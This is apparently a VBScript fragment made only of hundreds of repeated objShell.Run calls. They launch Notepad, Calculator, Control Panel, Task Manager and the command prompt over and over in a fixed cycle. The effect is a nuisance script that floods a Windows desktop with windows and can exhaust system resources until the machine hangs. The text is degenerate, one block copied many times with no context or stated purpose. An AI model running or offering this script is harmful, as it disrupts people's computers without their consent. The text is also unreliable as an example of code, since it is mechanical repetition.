objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

